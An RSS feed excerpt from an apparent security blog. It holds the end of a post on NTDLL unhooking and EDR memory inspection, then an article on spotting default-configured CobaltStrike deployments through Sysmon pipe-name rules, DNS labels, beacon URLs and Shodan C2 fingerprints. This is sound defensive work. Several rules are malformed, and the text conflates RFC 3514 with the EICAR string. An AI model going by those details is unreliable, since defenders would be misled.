00007ffe`ac970402 0f05             syscall
</code></pre>
<p>After the unhooking attempt, the jump instructions at the beginning of the functions are now redirecting to the original code blocks found in memory. By avoiding direct syscalls and not relying on any hooked APIs before unhooking, we have likely mitigated the blindspots caused by the hooks and restored the integrity of the ntdll.dll module.</p>
<p>A solution for EDR providers is to add memory inspection capabilities into their solutions to mitigate threats posed by threat actors that utilize in-memory disassembly techniques to unhook hooks in NTDLL, which is a critical component of the Windows operating system. Memory inspection can provide deeper visibility into the runtime state of processes and can help detect malicious activities that may be hidden in the memory space.</p>
<p>By inspecting the memory of processes, EDR solutions can identify suspicious or malicious code injections, hooking, and other tampering techniques that may be used by threat actors to bypass security controls and gain unauthorized access to a system. Memory inspection can also help detect advanced techniques such as reflective DLL loading, in which malicious code is loaded into a process's memory without touching the disk, making it harder to detect using traditional file-based detection methods.</p>
<p>Furthermore, memory inspection can provide context and behavioral analysis, helping to identify patterns of malicious behavior and uncover advanced persistent threats (APTs) that may be evading other security mechanisms. For example, EDR solutions with memory inspection capabilities can detect attempts to modify critical system structures, such as the SSDT (System Service Descriptor Table) or the IDT (Interrupt Descriptor Table), which are common targets for hooking techniques.</p>
<p>But a key constraint is that memory inspection during application runtime massively degrades usability and user experience because runtime memory requires significant processing power to scan. Considering the runtime environment of a typical game such as Genshin Impact which can hold close to 4GB of virtual memory, any solution trying to perform memory inspection will consume significant system resources. Secondly, memory is dynamic and there are limits to how many times you can stop an application without reducing its responsiveness making it impossible to continuously scan an application.</p>
<p><img src="https://pimages.toolbox.com/wp-content/uploads/2023/04/03114908/image2-1024x379.png" alt="https://pimages.toolbox.com/wp-content/uploads/2023/04/03114908/image2-1024x379.png" /></p>
<p>NGAV, EPPs, and EDRs/XDRs can perform memory introspection. However, this is typically done within a sandbox, not in the real-time environment of endpoints.</p>
<p>Sandbox environments typically isolate potentially malicious code and execute it in a controlled environment to observe its behavior. Attackers utilizing in-memory disassembly techniques to unhook hooks in NTDLL can evade detection by traditional file-based scanning methods, as the malicious code may not be written to disk.</p>
<p>The challenge is exacerbated by the fact that increasing amounts of threat actors are using polymorphism, packing, and obfuscation to hide their presence, including in-memory. This makes the chances of catching malicious activity in runtime memory close to zero.<strong>y</strong></p>
]]></content:encoded></item><item><title><![CDATA[Detecting Amateur CobaltStrike Operators]]></title><description><![CDATA[CobaltStrike by HelpSystems is an adversary simulation tool with advanced attack and evasion strategies. While its use have gained popularity within red teams, its abuse has also been increasing with threat actors. CobaltStrike is used by sophisticat...]]></description><link>https://research.meekolab.com/detecting-amateur-cobaltstrike-operators</link><guid isPermaLink="true">https://research.meekolab.com/detecting-amateur-cobaltstrike-operators</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 02 Nov 2022 03:23:06 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1666702477890/MlOinCt_o.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>CobaltStrike by HelpSystems is an adversary simulation tool with advanced attack and evasion strategies. While its use have gained popularity within red teams, its abuse has also been increasing with threat actors. CobaltStrike is used by sophisticated groups, and even state-backed entities from <a target="_blank" href="https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda">China</a> are known to use the software to gain a foothold inside corporate and governmental institutions.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1666703785766/F1ZuqU4iK.png" alt="image1.png" /></p>
<p>The rise of cracked versions of CobaltStrike have also further proliferated the tool among threat actors, due to pirated of the software being very easy to come by due to CobaltStrike’s design in Java (to be honest, CS is easier to crack than Minecraft at this point).</p>
<p>Cobalt Strike’s popularity is mainly due to its beacons being stealthy, stable, and highly customizable. CS <a target="_blank" href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/init-access_main.htm#_Toc65482750">beacons</a> are stealthy due to in-memory execution via reflection into the memory of a process without affecting the file system. Cobalt Strike’s <a target="_blank" href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_main.htm">post-exploitation suite</a> includes support for keylogging, command execution, credential dumping, file transfer, port scanning, and more. <a target="_blank" href="https://www.cobaltstrike.com/help-malleable-c2">Malleable C2</a> allows attackers to change how its beacons look and mimic other legitimate traffic to stay ahead of network intrusion detection systems.</p>
<p>While there are no one-stop solutions for detecting and preventing CobaltStrike due to its inherent customizable nature, there are several ways to spot adversaries that are less careful in their implementation of attack attempts.</p>
<h3 id="heading-trial-version-deficiencies">Trial Version Deficiencies</h3>
<p><a target="_blank" href="https://www.cobaltstrike.com/offensive-security-advanced-bundle-trial/">Evaluation</a> copies of CobaltStrike are somewhat rare to encounter, but still somewhat common as there is a large gradation of technical levels for the users of CobaltStrike. The trial version however embeds alot of default values for it to be easily detected inside production infrastructure to make sure that the evaluasion version isn’t abused for professional or adverserial work.</p>
<p>Using it’s infamous Malleable C2 profiles, CobaltStrike embeds each GET transaction from the trial version with an X-Malware header, specifically <a target="_blank" href="https://www.ietf.org/rfc/rfc3514.txt">RFC 3514</a> EICAR string which is an IPv4 flag to allow traffic to flag itself as malicious. The EICAR string is also present in the Java Applet attacks that ship with CobaltStrike trial version, with the EICAR file being embedded inside the jar.</p>
<p>CobaltStrike’s Artifact Kit, an executable generate to smuggle payloads past some AV/EDR products, is also modified in the trial version. The Artifact Kit in the trial version embeds CobaltStrike’s stager shellcode into executables and DLLs with no steps to disrupt an AV/EDR sandbox system.</p>
<h3 id="heading-dns-labels">DNS Labels</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1666703740392/XVGQaFVXc.jpg" alt="EmnIZnfXcAAG2rM-large.jpg" /></p>
<p>In late 2020, the entirety of CobaltStrike’s 4.0 source code was leaked onto GitHub. The source code reveals that Cobalt Strike uses three DNS unique labels : <code>cdn</code> for A records, <code>api</code> for TXT records and <code>www6</code> for AAAA records. Through this you can build custom detection rules from your IPS/IDS solution to flag these DNS requests for further investigation.</p>
<h3 id="heading-named-pipes">Named Pipes</h3>
<p>Named pipes are essential for the operation of Cobalt Strike beacons as it is used for AV evasion, lateral movement, communications between multiple beacons, and various post-exploitation activities. Before version 4.2, CobaltStrike didn’t allow the operators to change the default naming scheme of named pipes. </p>
<p>However, in a blogpost by the HelpSystems, they provide an overview on Named Pipes and how operators should change their default values for OPSEC considerations. However, due to less-sophisticated threat actors getting their hands on the software, there is an opportunity to stop some attacks by deploying Sysmon detection rules for default CobalStrike pipe names.</p>
<pre><code class="lang-c">&lt;PipeName condition=<span class="hljs-string">"contains all"</span>&gt;MSSE-;-server&lt;/PipeName&gt;
&lt;PipeName condition-<span class="hljs-string">"begin with"</span>&gt;\postex_&lt;/PipeName&gt;
&lt;PipeName condition-<span class="hljs-string">"begin with"</span>&gt;\postex_ssh_&lt;/PipeName&gt;
&lt;PipeName condition-<span class="hljs-string">"begin with"</span>&gt;\status_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\mojo<span class="hljs-number">.5688</span><span class="hljs-number">.8052</span><span class="hljs-number">.183894939787088877</span>&lt;/PipeName&gt;
&lt;PipeName condition-<span class="hljs-string">"begin with"</span>&gt;\mojo<span class="hljs-number">.5688</span><span class="hljs-number">.8052</span><span class="hljs-number">.35780273329370473</span>&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\mypipe-f&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\mypipe-h&lt;/PipeName&gt;
&lt;PipeName condition-<span class="hljs-string">"begin with"</span>&gt;\windows.update.manager&lt;/PipeName&gt;
&lt;PipeName condition-<span class="hljs-string">"begin with"</span>&gt;\msagent_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\DserNamePipe&lt;/PipeName&gt;
&lt;PipeName condition-<span class="hljs-string">"begin with"</span>&gt;\Intsvcs_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\scerpc_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\scerpc&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\ntsvcs&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\wkssvc&lt;/PipeName&gt;
</code></pre>
<p>These detection rules are able to caught a large portion of CobaltStrike attacks that are configured with default values, perhaps thanks to many individuals not reading the instructions. Below is a Sysmon event ID 17 for a CobaltStrike SMB beacon pipe.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1666699272690/4Zd_55hVJ.png" alt="image20-EID17-18-pipeevednts.png" /></p>
<h3 id="heading-abnormal-login-events">Abnormal Login Events</h3>
<p>Lateral movement using Cobalt Strike (and other offensive tools) can also generate abnormal Windows login events. One example of a detection strategy would be to look for <a target="_blank" href="https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4624">event ID 4624</a> in the Windows Security log, with a LogonType value of 9 (NewCredentials — A caller cloned its current token and specified new credentials for outbound connections, and the new logon session has the same local identity, but uses different credentials for other network connections).</p>
<h3 id="heading-beacon-traffic-detection">Beacon Traffic Detection</h3>
<p>CobaltStrike beacons are customizable with many public and private configurations existing to hide potential traffic from network monitors. By default a CobaltStrike beacon will check into a server every 60 seconds, but this can be changed to add connection jitters in order to mimic real network connections. However, many less sophisticated threat-actors don’t customize beacon traffic sufficiently to avoid detection.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1667358786871/AfX4fLGhM.png" alt="Screenshot 2022-10-25 at 13.19.18.png" /></p>
<p>One default configuration characteristic for detecting CobaltStrike beacons is the URL string <code>/submit.php?id=[9-10 digit string]</code>. This string is observable in HTTP POST communications when using some cracked or trial versions of CobaltStrike, which may not include all of the features of a licensed and updated version.</p>
<h3 id="heading-c2-server-detection">C2 Server Detection</h3>
<p>There are various publicly known methods for identifying CobaltStrike C2 Servers:</p>
<ul>
<li>The default controller port for CobaltStrike Team Server is <code>50050/TCP</code>, a port not usually open on other servers. Using Shodan to search open <code>port:50050</code> can give visibility to CobaltStrike control ports, but could still be a false positive.</li>
<li>Detection of CobaltStrike's JARM signature (a tool by <a target="_blank" href="https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a/">Salesforce</a> to fingerprint TLS servers) by using Shodan and typing the query <code>ssl:jarm:&lt;07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1&gt;</code>, however this methodology could be a <a target="_blank" href="https://www.vanimpe.eu/2021/09/14/identify-malicious-servers-cobalt-strike-servers-with-jarm/">false positive</a>.</li>
<li>Cobalt Strike servers are shipped with a default security certificate that can be used to fingerprint them unless the administrator changes it. If you search Shodan for <code>ssl.cert.serial:146473198</code> you can identify servers making use of this default SSL certificate.</li>
<li>There is an extraneous space in the HTTP server response of NanoHTTPD servers that are visible even in Malleable C2 team servers. This bug is present in CobaltStrike versions below 3.13, which are the versions commonly used in many cracked copies. This can be rolled into a snort rule with the PCRE rule <code>/^HTTP/1.1 200 OK \r\nContent-Type: [^\r\n]{0,100}\r\nDate: [^\r\n]{0,100} GMT\r\n(Content-Length: \d+\r\n)\r\n/"</code>.</li>
</ul>
<h3 id="heading-conclusion">Conclusion</h3>
<p>CobaltStrike represents a more advanced progression of adversary tools from the days of Metasploit Framework (HelpSystems actually made Armitage, a GUI solution for msfconsole that morphed into CobaltStrike). As new systems to tackle attacks are developed, more sophisticated tools are developed to dismantle them in a perpetual weapons race.</p>
<p>Despite the advent of these more advanced tools many adversaries, especially those who are less technically-savvy, still sometimes forget to harden their payloads to evade certain detection techniques. There is also a large chunk of threat actors using cracked versions of CobaltStrike, which also give blue teams leeway into detecting certain patterns such as various information leaks by outdated beacon systems.</p>
<p>While CobaltStrike provides alot of leeway in their default configurations, for example the default naming options of pipes that mimic common Windows services, its still easy to spot the pattern in these default value attacks.</p>
]]></content:encoded></item></channel></rss>